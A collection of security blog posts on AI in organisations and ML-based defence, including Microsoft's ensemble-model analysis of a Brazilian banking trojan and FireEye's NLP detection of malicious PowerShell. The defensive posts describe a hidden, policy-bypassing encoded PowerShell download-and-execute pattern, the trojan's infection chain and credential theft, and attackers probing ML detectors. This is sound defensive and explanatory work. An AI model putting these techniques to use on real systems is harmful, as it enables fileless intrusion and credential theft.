The State of Security: The Challenges of Artificial Intelligence (AI) for Organisations

Governments, businesses and societies as a whole benefit enormously from Artificial Intelligence (AI). AI assists organisations in reducing operational costs, boosting user experience, elevating efficiency and cultivating revenue. But it also creates a number of security challenges for personal data and forms many ethical dilemmas for organisations. Such challenges for information security professionals mean re-calibration […]… Read More

The post The Challenges of Artificial Intelligence (AI) for Organisations appeared first on The State of Security.

The State of Security

The Challenges of Artificial Intelligence (AI) for Organisations

Governments, businesses and societies as a whole benefit enormously from Artificial Intelligence (AI). AI assists organisations in reducing operational costs, boosting user experience, elevating efficiency and cultivating revenue. But it also creates a number of security challenges for personal data and forms many ethical dilemmas for organisations. Such challenges for information security professionals mean re-calibration […]… Read More

The post The Challenges of Artificial Intelligence (AI) for Organisations appeared first on The State of Security.

Researchers exploring how IoT apps can to imitate human decisions

CA Technologies announced its participation in scientific research to discover how Internet of Things (IoT) applications can use a type of AI known as ‘deep learning’ to imitate human decisions. The research will also explore how to prevent that AI-based decisions are not producing biased results. This three-year research project is named ALOHA (adaptive and secure deep learning on heterogeneous architectures). “The future of all technologies will include AI and deep learning in some way,” … More

The post Researchers exploring how IoT apps can to imitate human decisions appeared first on Help Net Security.

Microsoft acquires Lobe to help bring AI development capability to everyone

Technology has already transformed the world we live in. Computers are ubiquitous, from the machines on our desks to the devices in our pockets and in our homes. Now, breakthroughs in artificial intelligence (AI) and deep learning are helping scientists treat cancer more effectively, farmers figure out how to grow more food using fewer natural resources, and give people from different countries the ability to communicate across language barriers.

In many ways though, we’re only just beginning to tap into the full potential AI can provide. This in large part is because AI development and building deep learning models are slow and complex processes even for experienced data scientists and developers. To date, many people have been at a disadvantage when it comes to accessing AI, and we’re committed to changing that.

Over the last few months, we’ve made multiple investments in companies to further this goal. The acquisition of Semantic Machines in May brought in a revolutionary new approach to conversational AI,  and the acquisition of Bonsai in July will help reduce the barriers to AI development through the Bonsai team’s unique work combining machine teaching, reinforcement learning and simulation. These are just two recent examples of investments we have made to help us accelerate the current state of AI development.

Lobe logo
Today, we’re excited to announce the acquisition of Lobe. Based in San Francisco, Lobe is working to make deep learning simple, understandable and accessible to everyone. Lobe’s simple visual interface empowers anyone to develop and apply deep learning and AI models quickly, without writing code.

We look forward to continuing the great work by Lobe in putting AI development into the hands of non-engineers and non-experts.  We’re thrilled to have Lobe join Microsoft and are excited about our future together to simplify AI development for everyone.


The post Microsoft acquires Lobe to help bring AI development capability to everyone appeared first on The Official Microsoft Blog.

It’s Time to Adopt AI in Your Security Operations Center

Security analysts: We know you’re overworked, understaffed and overwhelmed, and we understand that it’s not your fault. It’s not humanly possible for you to keep up with the ever-expanding threat landscape, especially given how busy you are with the day-to-day tasks of running your security operations center (SOC). We want you to know you’re not alone.

The Cybersecurity Skills Gap Is Only Getting Worse

According to research performed by the Enterprise Strategy Group, almost 51 percent of organizations in 2018 reported a “problematic shortage” of cybersecurity skills. Cybersecurity job fatigue is real, and according to ESG, almost 38 percent of security professionals claimed that the skills shortage has led to burnout and staff attrition. If you’re waiting for your job to magically become easier, you may want to think again; the situation is only getting worse.

Sure, the cybersecurity skills shortage and an ever-expanding threat landscape are valid excuses, but they’re not going to pay the bills when — not if — a data breach occurs. The Ponemon Institute found that average total cost of a data breach rose from $3.62 to $3.86 million in 2018, an increase of 6.4 percent from 2017.

Shorter Dwell Times Means Lower Costs

According to Ponemon, organizations that identified a breach in less than 100 days saved more than $1 million as compared to those that exceeded 100 days. Similarly, organizations that contained a breach in less than 30 days saved over $1 million as compared to those that took more than 30 days to resolve.

Simple, right? Identify the breach quickly and contain it to save your organization money. However, doing this when you receive more than 1 million daily security alerts is a daunting task, even for the best analysts. For those of you who aren’t security analysts, imagine having to sort and filter through a million emails in your inbox each day to figure out which require action and which are junk.

As a result, 30 percent of respondents to an Imperva survey admitted to having ignored certain categories of alerts, while 4 percent turned off the alert notifications altogether. Additionally, 56 percent admitted to having ignored an alert based on past experiences dealing with false positives.

Why You Should Adopt AI in the Security Operations Center

So, how do you combat cybersecurity job fatigue? Your best bet is to partner with artificial intelligence (AI) to force-multiply your team’s efforts in the security operations center. Here’s how to do it:

  • Automate incident analysis. Don’t waste human capital on routine analysis. Instead, let AI automate your repetitive SOC tasks while your team focuses on mission-critical decisions, such as suspicious behavior from insider threats.
  • Augment human intelligence. Upgrade your SOC by using AI to automatically find commonalities across incidents using cognitive reasoning to provide actionable feedback with context to your analysts.
  • Respond rapidly to threats. Reduce dwell times with automated hunting for indicators and add pertinent information to act on escalations for remediation and/or blocking.

Register for the exclusive webinar, “5 Reasons AI Is the Pillar of the Next-Gen SOC,” to learn about the top five challenges plaguing today’s SOCs and how security leaders can free up their analysts by leveraging AI technologies to focus on crucial threats.

Register for the live webinar, “5 Reasons AI Is the Pillar of the Next-Gen SOC”

The post It’s Time to Adopt AI in Your Security Operations Center appeared first on Security Intelligence.

What Are the Risks and Rewards Associated With AI in Healthcare?

The emergence of artificial intelligence (AI) in healthcare is enabling organizations to improve the customer experience and protect patient data from the raging storm of cyberthreats targeting the sector. However, since the primary goal of the healthcare industry is to treat ailing patients and address their medical concerns, cybersecurity is too often treated as an afterthought.

A recent study from West Monroe Partners found that 58 percent of parties that purchased a healthcare company discovered a cybersecurity problem after the deal was done. This may be due to a lack of personnel with in-depth knowledge of security issues. As AI emerges in the sector, healthcare professionals who misuse these technologies risk unintentionally exposing patient data and subjecting their organizations to hefty fines.

What’s Driving the AI Arms Race in Healthcare?

According to Wael Abdel Aal, CEO of telemedicine provider Tele-Med International, healthcare organizations should take advantage of AI to address two critical cybersecurity issues: greater visibility and improved implementation. Abdel Aal’s background includes 21 years as a leading cardiologist, which enables him to understand AI’s impact on healthcare from a provider’s perspective.

“Although AI security systems perform sophisticated protection algorithms, better AI systems are being developed to perform more sophisticated hacks,” he said. “The computer security environment is in a continuous race between offense and defense.”

According to Abdel Aal, the ongoing transformation in the healthcare industry depends not only on AI, but also other game-changing technologies, such as electronic medical records (EMR), online portals, wearable sensors, apps, the Internet of Things (IoT), smartphones, and augmented reality (AR) and virtual reality (VR).

“The combination of these technologies will bring us closer to modern healthcare,” he said. Abdel Aal went on to reference several potential points at which a cybersecurity breach can occur, including remote access to wearables and apps owned by the patient, connectivity with telecom, health provider access, and AI hosting.

“The potential value that these technologies will bring to healthcare is at balance with the potential security hazard it presents to individuals and societies,” AbdelAal explained. “The laws need continuous and fast updating to keep up with AI and the evolving legal questions of privacy, liability and regulation.”

As innovative technologies proliferate within healthcare systems, cyberattacks and cybercrime targeting healthcare providers are correlatively on the rise. In May 2017, for example, notorious ransomware WannaCry infected more than 200,000 victims in 150 countries. In January 2018, a healthcare organization based in Indiana was forced to pay $55,000 to cybercriminals to unlock 1,400 files of patient data, as reported by ZDNet.

In these cases, it was faster and more cost-effective for the hospital to pay the (relatively) small ransom than it would have been to undergo a complex procedure to restore the files. Unfortunately, paying the ransom only encourages threat actors. Ransomware is just the beginning; as malicious AI advances, attacks will only become more devastating.

Why Mutual Education Is Critical to Secure AI in Healthcare

So how can security leaders educate physicians and other healthcare employees to handle these new tools properly and avoid compromising patients’ privacy? Abdel Aal believes the answer is bidirectional education.

“Security leaders need to understand and experience the operational daily workflow protocols performed by individual healthcare providers,” he said. “Accordingly, they need to educate personnel and identify the most vulnerable entry points for threats and secure them.”

While the utilization of AI in healthcare is indeed on the rise and is dramatically changing the industry, according to AbdelAal, the technology driving it hasn’t evolved as fast as it could. One of the most significant hurdles for the industry to overcome is employees’ overall aversion to new technology.

“Adoption of new technology was and always is a major deterrent, be that CT, MRI or, presently, AI,” he said. “Providers, whether doctors, nurses, technicians and others, usually see new technology as a threat to their job market. They identify with the benefits but would rather stay within their comfort zone.”

Abdel Aal also pointed to legal and regulatory factors as stumbling blocks that might prompt confusion about managing progress.

Thankfully, the American Medical Association (AMA) is prepared to address these changes. According to its recently approved AI policy statement, the association will support the development of healthcare AI solutions that safeguard patient privacy rights and preserve the security and integrity of personal information. The policy states that, among other things, the AMA will actively promote engagement with AI healthcare analytics while exploring their expanding possibilities and educating patients and healthcare providers.

Patient wellness will always be the first priority in healthcare, and this is not lost on threat actors. Just like any other industry, it is increasingly imperative for leaders to understand the progressive intertwining of their primary goals with cybersecurity practices and respond accordingly.

The post What Are the Risks and Rewards Associated With AI in Healthcare? appeared first on Security Intelligence.

Legal AI: How Machine Learning Is Aiding — and Concerning — Law Practitioners

Law firms tasked with analyzing mounds of data and interpreting dense legal texts can vastly improve their efficiency by training artificial intelligence (AI) tools to complete this processing for them. While AI is making headlines in a wide range of industries, legal AI may not come to mind for many. But the technology, which is already prevalent in the manufacturing, cybersecurity, retail and healthcare sectors, is quickly becoming a must-have tool in the legal industry.

Due to the sheer volume of sensitive data belonging to both clients and firms themselves, legal organizations are in a prickly position when it comes to their responsibility to uphold data privacy. Legal professionals are still learning what the privacy threats are and how they intersect with data security regulations. For this reason, it’s critical to understand security best practices for operations involving AI.

Before tackling the cybersecurity implications, let’s explore some reasons why the legal industry is such a compelling use case for AI.

How Do Legal Organizations Use AI?

If you run a law firm, imagine how much more efficient you could be if you could train your software to recognize and predict patterns that not only improve client engagement, but also streamline the workflow of your legal team. Or what if that software could learn to delegate tasks to itself?

With some AI applications already on the market, this is only the beginning of what the technology can do. For example, contract analysis automation solutions can read contracts in seconds, highlight key information visually with easy-to-read graphs and charts, and get “smarter” with each contract reviewed. Other tools use AI to scan legal documents, case files and decisions to predict how courts will rule in tax decisions.

In fact, the use of AI in the legal industry has been around for years, according to Sherry Askin, CEO of Omni Software Systems. Askin has deep roots in the AI field, including work with IBM’s Watson.

“AI is all about increasing efficiency, and is being touted as the next revolution,” she said. “We’ve squeezed as much as we can from human productivity through automation. The next plateau from productivity and the next threshold is AI.”

Why Machine Learning Is Critical

Law is all about words, natural language and the coded version of an unstructured version, said Askin. While we know how to handle the coded versions, she explained, the challenge with legal AI is that outputs are so tightly tailored to past results described by their inputs. That’s where machine learning comes in to predict how these inputs might change.

Askin compared machine learning to the process of intellectual development by which children soak up news words, paragraphs, long arguments, vocabulary and, most importantly, context. With deep learning, not only are you inputting data, but you’re giving the machine context and relevance.

“The machine is no longer a vessel of information,” Askin explained. “It figures out what to do with that information and it can predict things for you.”

Although machines can’t make decisions the same way that humans can, the more the neural processing and training they conduct, the more sophisticated their learning and deliverables can become. Some legal AI tools can process and analyze thousands of lease agreements, doing in seconds what humans would do in weeks.

How Do Privacy Regulations Impact Legal Firms?

For any industry, protecting privileged client data is a paramount concern. The American Bar Association, which requires practitioners to employ reasonable efforts to prevent unauthorized access to client data, has implemented periodic changes and updates to address the advances of technology. In addition, the Legal Cloud Computing Association (LCCA) issued 21 standards to assist law firms and attorneys in addressing these needs, including testing, limitations on third-party access, data retention policy, encryption, end user authentication and modifications to data.

Askin urged legal organizations to evaluate strategies impacting security and privacy in the context of what they modify or replace.

“I believe this is a major factor in legal because the profession has a deep legacy of expert-led art,” she said. “Traditional IT automation solutions perform best with systematized process and structured data. Unfortunately, systematization and structure are not historically compatible with the practice of law or any other professional disciplines that rely on human intelligence and dynamic reasoning.”

How to Keep Legal AI Tools in the Right Hands

Legal organizations are tempting targets for malicious actors because they handle troves of sensitive and confidential information. Rod Soto, director of security research for Jask, recommended several key strategies: employ defense in depth principles at the infrastructure level, train personnel in security awareness and use AI to significantly enhance security posture overall. To protect automated operations conducted by AI, Soto warned, we must understand that while these AI systems are trained to be effective, they can also be steered off course.

“Malicious actors can and will approach AI learning models and will attempt to mistrain them, hence the importance of feedback loops and sanity checks from experienced analysts,” he said. “You cannot trust AI blindly.”

Finally, it’s crucial for legal organizations to understand that AI does not replace a trained analyst.

“AI is there to help the analyst in things that humans have limitations, such as processing very large amounts of alarms or going through thousands of events in a timely manner,” said Soto. “Ultimately, it is upon the trained analyst to make the call. An analyst should always exercise judgment based on his experience when using AI systems.”

Because the pressure to transform is industrywide, profound changes are taking shape to help security experts consistently identify the weakest link in the security chain: people.

“It’s nearly impossible to control all data and privacy risks where decentralized data and human-managed processes are prevalent,” Askin said. “The greater the number of endpoints, the higher the risk of breach. This is where the nature of AI can precipitate a reduction in security and privacy vulnerabilities, particularly where prior IT adoption or data protection practices were limited.”

The post Legal AI: How Machine Learning Is Aiding — and Concerning — Law Practitioners appeared first on Security Intelligence.

Stop Impersonations of Your CEO by Checking the Writing Style

If one of your employees receives an email that looks like it’s from the CEO asking to send sensitive data or to make a wire transfer, could that employee spot it as a fake based on how it is written? He or she may be so concerned with pleasing the CEO that they may urgently respond without a second thought. What if artificial intelligence could recognize that the writing style of suspect email doesn’t match the style of your CEO to spot fraud? It can.

Writing Style DNA technology is now available to prevent Business Email Compromise Attacks (BEC) which according to the FBI has cost organizations $12.5 billion with some companies losing as much as $56 million dollars.

Want to skip the reading? Watch this short video

Unique Writing Style

Some of us write long sentences with a variety of words while others are more direct with short words and small paragraphs. If we look at the email of three Enron executives (based on a dataset of 500,000 emails released publicly during the Federal Energy Regulatory Commission’s investigation) we can see the differences in how they write. Looking at the emails from Jeffrey Skilling, Sally Beck, and David Delainey, we can compare writing style elements such as sentence length, word length, repeated words, paragraph length, pronoun usage, and adjective usage.

Graph of writing style elements of 3 Enron executives

We see that the three executives style vary across the 16 elements in the chart above. As humans, we can perhaps come up with 50 or maybe 100 different writing style elements to measure. A computer AI though can see many more differences between users writing. The AI powering Writing Style DNA can exam an email for 7000 writing style elements in less than a quarter of a second.

If we know what an executive’s writing style looks like, then the AI can compare the expected style to the writing in an email suspected of impersonating that executive. 

Training an AI model of a User’s Writing Style

Based on previous Business Email Compromise attacks, we see that the CEO and Director are most likely to be impersonated and can define these individuals as “high-profile users” within the admin console for Trend Micro Cloud App Security or ScanMail for Exchange.


Titles of impersonated senders in 1H 2018 Business Email Compromise attempts 

To create a well-defined model of a high-profile user’s writing style, the AI examines 300-500 previously sent emails. Executive’s email is highly sensitive and to protect privacy, the AI extracts metadata describing the writing style but not the actual text. 

Your executives style of writing isn’t static but rather evolves over time just like this infographic shows JK Rowling’s style changing over the course of writing the Harry Potter books. As such, the AI model for a high-profile user can be regularly updated at a select interval. 

Process Flow

When an external email from a name similar to a high-profile user, the writing style of the email content is examined after other anti-fraud checks. The volume of BEC attacks is small to start with (compared to other types of phishing) and other AI based technologies catch most attacks which leaves only a small number of the stealthiest attacks for writing style examination. For these attacks, if the style doesn’t match, the recipient is warned not to act on the email unless he/she verifies the sender’s identity using a phone number or email from the company directory. Optionally, the impersonated executive can also be warned of the fraud attempt on their behalf. 

Internal and Beta Results

Internally, Trend Micro has been testing this since January of 2018. Writing style models are in place for our executive team and some other high-profile users. During this time, Writing Style DNA detected 15 additional BEC attacks which were attempting to impersonate our CEO, Eva Chen. This works out to an average of 1 additional attack detected every other week. To date, there have been no false positives.

Sample BEC attempt detected with Writing Style DNA

We have also had more than 60 beta customers try the technology over the past few months. Many initially found their executives were using their personal email accounts occasionally to email others at the organization and these personal accounts can be whitelisted by the admin. Writing Style DNA detected 15 additional BEC attacks at 7 organizations. 

Available now and included with your license

Writing Style DNA is now available with Cloud App Security for Office 365 and ScanMail for Microsoft Exchange at no additional charge.

The Cloud App Security service has been updated already to include this functionality and ScanMail customers can upgrade to SMEX 12.5 SP1 to start using this technology. ScanMail customers can learn more about upgrading to v12.5 SP1 at this webinar September 6.

The post Stop Impersonations of Your CEO by Checking the Writing Style appeared first on .

Protecting the protector: Hardening machine learning defenses against adversarial attacks

Harnessing the power of machine learning and artificial intelligence has enabled Windows Defender Advanced Threat Protection (Windows Defender ATP) next-generation protection to stop new malware attacks before they can get started often within milliseconds. These predictive technologies are central to scaling protection and delivering effective threat prevention in the face of unrelenting attacker activity.

Consider this: On a recent typical day, 2.6 million people encountered newly discovered malware in 232 different countries (Figure 1). These attacks were comprised of 1.7 million distinct, first-seen malware and 60% of these campaigns were finished within the hour.

Figure 1. A single day of malware attacks: 2.6M people from 232 countries encountering malware

While intelligent, cloud-based approaches represent a sea change in the fight against malware, attackers are not sitting idly by and letting advanced ML and AI systems eat their Bitcoin-funded lunch. If they can find a way to defeat machine learning models at the heart of next-gen AV solutions, even for a moment, theyll gain the breathing room to launch a successful campaign.

Today at Black Hat USA 2018, in our talk Protecting the Protector: Hardening Machine Learning Defenses Against Adversarial Attacks [PDF], we presented a series of lessons learned from our experience investigating attackers attempting to defeat our ML and AI protections. We share these lessons in this blog post; we use a case study to demonstrate how these same lessons have hardened Microsofts defensive solutions in the real world. We hope these lessons will help provide defensive strategies on deploying ML in the fight against emerging threats.

Lesson: Use a multi-layered approach

In our layered ML approach, defeating one layer does not mean evading detection, as there are still opportunities to detect the attack at the next layer, albeit with an increase in time to detect. To prevent detection of first-seen malware, an attacker would need to find a way to defeat each of the first three layers in our ML-based protection stack.

Figure 2. Layered ML protection

Even if the first three layers were circumvented, leading to patient zero being infected by the malware, the next layers can still uncover the threat and start protecting other users as soon as these layers reach a malware verdict.

Lesson: Leverage the power of the cloud

ML models trained on the backend and shipped to the client are the first (and fastest) layer in our ML-based stack. They come with some drawbacks, not least of which is that an attacker can take the model and apply pressure until it gives up its secrets. This is a very old trick in the malware authors playbook: iteratively tweak prospective threats and keep scanning it until its no longer detected, then unleash it.

Figure 3. Client vs. cloud models

With models hosted in the cloud, it becomes more challenging to brute-force the model. Because the only way to understand what the models may be doing is to keep sending requests to the cloud protection system, such attempts to game the system are out in the open and can be detected and mitigated in the cloud.

Lesson: Use a diverse set of models

In addition to having multiple layers of ML-based protection, within each layer we run numerous individual ML models trained to recognize new and emerging threats. Each model has its own focus, or area of expertise. Some may focus on a specific file type (for example, PE files, VBA macros, JavaScript, etc.) while others may focus on attributes of a potential threat (for example, behavioral signals, fuzzy hash/distance to known malware, etc.). Different models use different ML algorithms and train on their own unique set of features.

Figure 4. Diversity of machine learning models

Each stand-alone model gives its own independent verdict about the likelihood that a potential threat is malware. The diversity, in addition to providing a robust and multi-faceted look at potential threats, offers stronger protection against attackers finding some underlying weakness in any single algorithm or feature set.

Lesson: Use stacked ensemble models

Another effective approach weve found to add resilience against adversarial attacks is to use ensemble models. While individual models provide a prediction scoped to a particular area of expertise, we can treat those individual predictions as features to additional ensemble machine learning models, combining the results from our diverse set of base classifiers to create even stronger predictions that are more resilient to attacks.

In particular, weve found that logistic stacking, where we include the individual probability scores from each base classifier in the ensemble feature set provides increased effectiveness of malware prediction.

Figure 5. Ensemble machine learning model with individual model probabilities as feature inputs

As discussed in detail in our Black Hat talk, experimental verification and real-world performance shows this approach helps us resist adversarial attacks. In June, the ensemble models represented nearly 12% of our total malware blocks from cloud protection, which translates into tens of thousands of computers protected by these new models every day.

Figure 6. Blocks by ensemble models vs. other cloud blocks

Case study: Ensemble models vs. regional banking Trojan

“The idea of ensemble learning is to build a prediction model by combining the strengths of a collection of simpler base models.”
— Trevor Hastie, Robert Tibshirani, Jerome Friedman

One of the key advantages of ensemble models is the ability to make high-fidelity prediction from a series of lower-fidelity inputs. This can sometimes seem a little spooky and counter-intuitive to researchers, but use cases weve studied show this approach can catch malware that singular models cannot. Thats what happened in early June when a new banking trojan (detected by Windows Defender ATP as TrojanDownloader:VBS/Bancos) targeting users in Brazil was unleashed.

The attack

The attack started with spam e-mail sent to users in Brazil, directing them to download an important document with a name like inside of which was a document that is really a highly obfuscated .vbs script.

Figure 7. Initial infection chain

Figure 8. Obfuscated malicious .vbs script

While the script contains several Base64-encoded Brazilian poems, its true purpose is to:

  • Check to make sure its running on a machine in Brazil
  • Check with its command-and-control server to see if the computer has already been infected
  • Download other malicious components, including a Google Chrome extension
  • Modify the shortcut to Google Chrome to run a different malicious .vbs file

Now whenever the user launches Chrome, this new .vbs malware instead runs.

Figure 9. Modified shortcut to Google Chrome

This new .vbs file runs a .bat file that:

  • Kills any running instances of Google Chrome
  • Copies the malicious Chrome extension into %UserProfile%\Chrome
  • Launches Google Chrome with the load-extension= parameter pointing to the malicious extension

Figure 10. Malicious .bat file that loads the malicious Chrome extension

With the .bat files work done, the users Chrome instance is now running the malicious extension.

Figure 11. The installed Chrome extension

The extension itself runs malicious JavaScript (.js) files on every web page visited.

Figure 12. Inside the malicious Chrome extension

The .js files are highly obfuscated to avoid detection:

Figure 13. Obfuscated .js file

Decoding the hex at the start of the script, we can start to see some clues that this is a banking trojan:

Figure 14. Clues in script show its true intention

The .js files detect whether the website visited is a Brazilian banking site. If it is, the POST to the site is intercepted and sent to the attackers C&C to gather the users login credentials, credit card info, and other info before being passed on to the actual banking site. This activity is happening behind the scenes; to the user, theyre just going about their normal routine with their bank.

Ensemble models and the malicious JavaScript

As the attack got under way, our cloud protection service received thousands of queries about the malicious .js files, triggered by a client-side ML model that considered these files suspicious. The files were highly polymorphic, with every potential victim receiving a unique, slightly altered version of the threat:
Figure 15. Polymorphic malware

The interesting part of the story are these malicious JavaScript files. How did our ML models perform detecting these highly obfuscated scripts as malware? Lets look at one of instances. At the time of the query, we received metadata about the file. Heres a snippet:

Report time 2018-06-14 01:16:03Z
SHA-256 1f47ec030da1b7943840661e32d0cb7a59d822e400063cd17dc5afa302ab6a52
Client file type model SUSPICIOUS
File name vNSAml.js
File size 28074
Extension .js
Is PE file FALSE
File age 0
File prevalence 0
Path C:\Users\<user>\Chrome\1.9.6\vNSAml.js
Process name xcopy.exe

Figure 16 File metadata sent during query to cloud protection service

Based on the process name, this query was sent when the .bat file copied the .js files into the %UserProfile%\Chrome directory.

Individual metadata-based classifiers evaluated the metadata and provided their probability scores. Ensemble models then used these probabilities, along with other features, to reach their own probability scores:

Model Probability that file is malware
Fuzzy hash 1 0.01
Fuzzy hash 2 0.06
ResearcherExpertise 0.64
Ensemble 1 0.85
Ensemble 2 0.91

Figure 17. Probability scores by individual classifiers

In this case, the second ensemble model had a strong enough score for the cloud to issue a blocking decision. Even though none of the individual classifiers in this case had a particularly strong score, the ensemble model had learned from training on millions of clean and malicious files that this combination of scores, in conjunction with a few other non-ML based features, indicated the file had a very strong likelihood of being malware.

Figure 18. Ensemble models issue a blocking decision

As the queries on the malicious .js files rolled in, the cloud issued blocking decisions within a few hundred milliseconds using the ensemble models strong probability score, enabling Windows Defender ATPs antivirus capabilities to prevent the malicious .js from running and remove it. Here is a map overlay of the actual ensemble-based blocks of the malicious JavaScript files at the time:

Figure 19. Blocks by ensemble model of malicious JavaScript used in the attack

Ensemble ML models enabled Windows Defender ATPs next-gen protection to defend thousands of customers in Brazil targeted by the unscrupulous attackers from having a potentially bad day, while ensuring the frustrated malware authors didnt hit the big pay day they were hoping for. Bom dia.


Further reading on machine learning and artificial intelligence in Windows Defender ATP

Indicators of compromise (IoCs)

  • (SHA-256: 93f488e4bb25977443ff34b593652bea06e7914564af5721727b1acdd453ced9)
  • Doc062018-2.vbs (SHA-256: 7b1b7b239f2d692d5f7f1bffa5626e8408f318b545cd2ae30f44483377a30f81)
  • zobXhz.js 1f47(SHA-256: ec030da1b7943840661e32d0cb7a59d822e400063cd17dc5afa302ab6a52)




Randy Treit, Holly Stewart, Jugal Parikh
Windows Defender Research
with special thanks to Allan Sepillo and Samuel Wakasugui



Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Protecting the protector: Hardening machine learning defenses against adversarial attacks appeared first on Microsoft Secure.

Malicious PowerShell Detection via Machine Learning


Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.


PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).

Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.

Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).

Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.

Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command unveils a stealthy fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring will download the contents from <url> into a memory buffer (which in turn IEX will execute).

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonym, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm will reduce the word to its original form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.

Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)

The overall NLP pipeline we developed is captured in the following table:

NLP Key Modules



Detect and decode any encoded text

Named Entity Recognition (NER)

Detect and recognize any entities such as IP, URL, Email, Registry key, etc.


Tokenize the PowerShell command into a list of tokens


Stem tokens into semantically identical token, uses trie

Vocabulary Vectorizer

Vectorize the list of tokens into machine learning friendly format

Supervised classifier

Binary classification algorithms:

  • Kernel Support Vector Machine
  • Gradient Boosted Trees
  • Deep Neural Networks


The explanation of why the prediction was made. Enables analysts to validate predications.

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model

Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.

Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.


We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
